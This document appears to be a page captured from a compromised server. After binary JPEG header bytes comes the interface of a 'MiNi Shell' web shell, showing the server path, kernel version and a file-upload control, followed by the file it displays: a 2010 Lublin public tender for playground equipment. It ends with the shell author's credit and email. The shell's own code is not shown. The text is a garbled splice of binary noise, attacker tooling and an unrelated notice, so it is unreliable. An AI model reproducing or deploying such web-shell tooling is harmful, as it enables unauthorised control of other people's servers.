JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100706/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20100706/178013-N-2010.html

<p class="kh_header"><b>Lublin: Dostawa i montaż urządzeń zabawowych i komunalnych do wyposażenia placów zabaw</b><br>
<b>Numer ogłoszenia: 178013 - 2010; data zamieszczenia: 06.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Lublin , Pl. Łokietka 1, 20-950 Lublin, woj. lubelskie, tel. 081 4663000, faks 081 4663001.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.lublin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa i montaż urządzeń zabawowych i komunalnych do wyposażenia placów zabaw.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Zakres zamówienia obejmuje: dostawę i montaż niżej wymienionych urządzeń drewnianych i urządzeń komunalnych w tym:
1)Zestaw zabawowy nr I - 1 kpl
W skład, którego wchodzą:
- dwie wieże z podestem na wys. 110 cm (?10 cm)
- drewniane schody wejściowe na wys. 110 cm (?10 cm) z poręczami i warstwą antypoślizgową
- zjeżdżalnia na wys. 110 cm (?10 cm)
- trap wejściowy łukowy do wspinania się na wys. 100 cm (?10 cm)
- drabinka z poręczami
- gra interaktywna (kółko i krzyżyk, liczydło)

2)Zestaw zabawowy nr II - 6 kpl
W skład, którego wchodzą:
- wieża z dachem na wys. 90 cm (?10 cm)
- wieża bez dachu na wys. 60 cm (?10 cm)
- drabinka wejściowa, łukowa na wys. 60 cm (?10 cm)
- mostek pochyły z desek łączący dwie wieże na wys.  60cm (?10 cm) i 90 cm (?10 cm)
- drewniane schody wejściowe na wys. 60 cm (?10 cm) z barierką i warstwą antypoślizgową
- zjeżdżalnia na wys. 90 cm (?10 cm)

3)Zestaw zabawowy nr III - 2 kpl
W skład, którego wchodzą:
- przeplotnia z lin pionowa
- przeplotnia z lin pozioma
- lina do wspinania się
- drążek do podciągania się
- drabinka pionowa z poręczami
- dwa kółka gimnastyczne
- całość wys. 250 cm (?20 cm)

4)Zestaw zabawowy nr IV - 4 kpl
W skład, którego wchodzą:
- wieża bez dachu z podestem na wys. 90 cm (?10 cm)
- drewniane schody wejściowe na wys. 90 cm (?10 cm) z poręczami i warstwą antypoślizgową
- wieża bez dachu z podestem na wys.  120 cm (?10 cm)
- trap wejściowy łukowy  do wspinania się na wys. 120 cm (?10 cm)
- zjeżdżalnia
- balkonik
- lina do wspinania się

5)Zestaw zabawowy nr V - 1 kpl
W skład, którego wchodzą:
- wieża z dachem na wys 90 cm (?10 cm)
- wieża bez dachu na wys. 60 cm (?10 cm)
- drewniane schody wejściowe na wys. 60 cm (?10 cm) z poręczami i warstwą antypoślizgową
- zjeżdżalnia na wys. 90 cm (?10 cm)
- balkonik

6)Zestaw zabawowy nr VI - 1 kpl
W skład, którego wchodzą:
- wieża z krzyżującymi się łukami i podestem na wys. 120 cm (?10 cm)
- wieża z dachem z dachem i podestem na wys. 150 cm (?10 cm)
- dwie gry integracyjne (kółko i krzyżyk, liczydło)
- wieża z krzyżującymi się łukami i podestem na wys. 150 cm (?10 cm)
- mostek pochyły z desek na wys. 120 cm (?10 cm) i 150 cm (?10 cm)
- zjeżdżalnia na wys. 150 cm (?10 cm)
- drabinka łukowa na wys. 150 cm (?10 cm)
- drewniane schody wejściowe na wys. 120 cm (?10 cm) z poręczami i warstwą antypoślizgową
- przeplotnia przestrzenna w kształcie rury na wys. 120 cm (?10 cm)
- drabinka pozioma
- drabinka pionowa
- rura strażacka ze spiralą i liną do wspinania się
- most linowy wiszący na wys. 150 cm (?10 cm)
- dwa kółka gimnastyczne
- lina do wspinania się

7)Zestaw zabawowy nr VII - 1 kpl
W skład, którego wchodzą:
- wieża z dachem i podestem na wys. 150 cm (?10 cm)
- wieża bez dachu z podestem na wys.120 cm (?10 cm)
- zjeżdżalnia na wys. ok 150 cm
- drewniane schody wejściowe na wys. 150 cm (?10 cm) z poręczami i warstwą antypoślizgową
- przeplotnia przestrzenna w kształcie rury na wys. 120 cm (?10 cm)
- drabinka pozioma
- drabinka pionowa
- rura strażacka ze spiralą
- ścianka wspinaczkowa z liną

8)Piaskownica kwadratowa - 10 szt. -  bok długości 300 cm, z drewna klejonego warstwowo (kantówka min. 100mmx100mm o zaokrąglonych krawędziach) mocowana do podłoża za pomocą stalowych kotew.

9)Huśtawka podwójna dla młodszych dzieci (3-6 lat) - 11 szt. - z zamkniętymi lub zamykanymi siedziskami (koszyczki). Po obu stronach konstrukcji z drewna klejonego warstwowo - płyta zabezpieczająca ze sklejki wodoodpornej, grubości min. 25m. Łańcuch techniczny kalibrowany.

10)Huśtawka podwójna dla starszych dzieci (7-12 lat) - 5 szt. - z siedziskami z tworzywa zawieszonymi na łożyskach samosmarujących. Po obu stronach konstrukcji z drewna klejonego warstwowo - płyta zabezpieczająca ze sklejki wodoodpornej grubości min. 25mm. Łańcuch techniczny kalibrowany.

11)Huśtawka wagowa - 11 szt. - belka poprzeczna o długości ok 200 cm z drewna z mocowanymi na krawędziach od spodu odbojnikami pochłaniającymi energię, siedziska z oparciami ze sklejki wodoodpornej, uchwyty.

12)Huśtawka na sprężynie (kiwak) - 1-os. - 15 szt. - sprężyna ze stali ocynkowanej, zabezpieczona przed zakleszczeniem, całość wykonana z płyty HDPE, rurki i uchwyty stalowe, malowane proszkowo (pies, koń, motor).

13)Huśtawka na sprężynie (kiwak) - 2-os. - 2 szt. - sprężyny ze stali zabezpieczone przed zakleszczeniem, całość ze sklejki wodoodpornej o grubości min. 25mm, dwa siedziska z oparciem, elementy stalowe malowane proszkowo (helikopter, łódka, samochód).

14)Piaskownica przestrzenna (łódź, samochód) - 1 szt. - całość o wymiarach 350cm x 200cm (?10 cm), elementy konstrukcyjne z drewna klejonego warstwo, boki i siedziska ze sklejki wodoodpornej o grubości min. 25mm, daszek na wysokości 200 cm (?10 cm) ze sklejki wodoodpornej. Piaskownica mocowana do podłoża za pomocą stalowych kotew.
15)Karuzela tarczowa z siedziskami - 4 szt. - słup nośny łożyskowany, siedziska drewniane lub z płyty szalunkowej na 6 os., platforma z płyty szalunkowej, min. 25mm, wodoodpornej z warstwą antypoślizgową, średnica tarczy 160cm (?10 cm). Wszystkie elementy stalowe malowane proszkowo.

16)Regulamin placu zabaw - 15 szt.

17)Ławka drewniana bez oparcia (dedykowana do placów zabaw) - 19 szt., wymiary: długość - 150cm (?10 cm), szerokość - 50cm (?10 cm), wysokość siedziska -  42cm (?10 cm).

18)Kosz na śmieci - 17 szt. - z blachy ocynkowanej, pomalowany ekologicznymi farbami proszkowymi

19)Furtka - 6 szt.

20)Ogrodzenie metalowe (wraz ze słupkami), wys. 124 cm, wykonane z prętów zgrzewanych co 5 cm (?5 cm) w pionie i 20 cm (?10 cm) w poziomie, malowane proszkowo na zielono, bez wystających ostrych elementów - 271 mb.

21) Betonowy stolik do gry w szachy z czterema siedziskami - 1 kpl.

2. Wymagania podstawowe
- Wszystkie urządzenia przeznaczone do zamontowania na place zabaw powinny posiadać certyfikaty zgodności z normami europejskimi oraz certyfikaty bezpieczeństwa. Powinny posiadać wysoką jakość, estetykę, zapewnić bezpieczeństwo dla korzystających z tych urządzeń dzieci;
- Gwarancja na wszystkie w/w urządzenia - 3 lata;
- Elementy konstrukcyjne urządzeń zabawowych wykonane z drewna klejonego warstwowo, grubości min. 100mmx100mm z min. jednym frezem po każdej stronie.
- Elementy drewniane malowane farbami akrylowymi;
- Elementy łączone śrubami ocynkowanymi. 
- Wszystkie połączenia śrubowe wykonane w gniazdach i zakryte plastikową zaślepką, wystające nakrętki zakryte plastikową zaślepką.
- Urządzenia osadzone na stalowych kotwach do zabetonowania w ziemi;
- Elementy ze sklejki wodoodpornej o grubości min. 25mm (w tym daszki, poręcze, wzmocnienia);
- Ślizgi zjeżdżalni wykonane ze stali nierdzewnej;
- Elementy stalowe (barierki, konstrukcje nośne, uchwyty) - malowane proszkowo na różne kolory;
- Górne belki w huśtawkach wahadłowych wykonane z profilu stalowego;
- Huśtawki wahadłowe z zabezpieczeniami po bokach ze sklejki wodoodpornej min. 25mm;
- Siedziska urządzeń wykonane ze stali powlekane tworzywem sztucznym;
- Gniazda łączników zabezpieczone osłonami z tworzywa sztucznego;
- Huśtawki na sprężynie 2-os. wykonane ze sklejki wodoodpornej min. 25mm, sprężyna zabezpieczona przed zakleszczeniem; 
- Huśtawki na sprężynie 1-os. wykonane z płyty HDPE, sprężyna zabezpieczona przed zakleszczeniem;
- Liny stalowe w oplocie polipropylenowym..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 37.53.52.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Jako spełniający warunki udziału w postępowaniu zostaną ocenieni wykonawcy, którzy wykażą się wykonaniem min 3 dostaw urządzeń zabawowych i komunalnych wraz z montażem do wyposażenia na place zabaw o wartości min. 150.000,00 zł brutto każda w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy - w przypadku składania oferty przez podmioty występujące wspólnie należy podać nazwy (firmy) oraz dokładne adresy wszystkich wykonawców składających ofertę wspólną. 2. Oświadczenie o części zamówienia, której wykonanie, wykonawca zamierza powierzyć podwykonawcom w przypadku powierzenia przez wykonawcę części zamówienia podwykonawcom. 3. Wycena ofertowa.4. Pełnomocnictwo do reprezentowania w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy, w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia zgodnie z art. 23 ustawy Prawo zamówień publicznych (dotyczy również wspólników spółki cywilnej). 5. Pełnomocnictwo do występowania w imieniu wykonawcy, w przypadku gdy dokumentów składających się na ofertę nie podpisuje osoba uprawniona do reprezentowania wykonawcy zgodnie z odpisem z Krajowego Rejestru Sądowego lub wykonawca - w przypadku osób fizycznych. 6. W sytuacji, gdy wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. 7. Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w III.4.3), zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania - wystawionym nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Skrócenie terminu realizacji - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Dopuszczalne są następujące rodzaje i warunki istotnej zmiany treści umowy:
a) zmiana stawki i kwoty podatki VAT oraz wynagrodzenia brutto
b) zmiana terminu realizacji przedmiotu zamówienia w przypadku:
- gdy wykonanie zamówienia w określonym pierwotnie terminie nie leży w interesie Zamawiającego;
- działania siły wyższej, uniemożliwiającej wykonanie umowy w określonym pierwotnie terminie;
- przerwy wykonania prac spowodowanej niekorzystnymi warunkami atmosferycznymi uniemożliwiającymi prowadzenie robót zgodnie z obowiązującymi przepisami. 
- realizacji w drodze odrębnej umowy prac powiązanych z przedmiotem niniejszej umowy, wymuszającej konieczność skoordynowania prac i uwzględnienia wzajemnych powiązań.
2.Zmiany umowy przewidziane w ust. 1 dopuszczalne są na następujących warunkach:
- ad pkt a) - stawka i kwota podatku VAT oraz wynagrodzenie brutto ulegną zmianie odpowiednio do przepisów prawa wprowadzających zmianę
- ad pkt b) - zmiana terminu realizacji przedmiotu zamówienia:
- o czas umożliwiający osiągnięcie uzasadnionego interesu Zamawiającego
- o czas niezbędny do usunięcia skutków działania siły wyższej
- o czas trwania niekorzystnych warunków atmosferycznych
- o czas niezbędny do wykonania prac powiązanych z przedmiotem niniejszej umowy, realizowanych w drodze odrębnej umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.lublin.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Biuro Zamówień Publicznych UM Lublin, Pl. Litewski 1, pok. nr 3 po wcześniejszym dokonaniu wpłaty 7 zł w kasie UM Lublin, ul. Wieniawska 14 lub za zaliczeniem pocztowym ( 7 zł + koszt przesyłki).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.07.2010 godzina 10:30, miejsce: Biuro Zamówień Publicznych UM Lublin, Pl. Litewski 1, pokój nr 3.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.1.Osobami upoważnionymi do kontaktowania się z wykonawcami są:
1.W zakresie przedmiotu zamówienia: p. Marek Pukaluk, Aleksandra Wojtaszek - Wydział Gospodarki Komunalnej Urzędu Miasta Lublin, ul.Zana 38, piętro VII, pokój nr 708, telefon (081) 466-31-20, 466-31-21.
2.W zakresie procedury: p. Iwona Wieżel - Biuro Zamówień Publicznych Urzędu Miasta  Lublin, Plac Litewski 1, pokój nr 3, telefon (081) 466-30-12..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com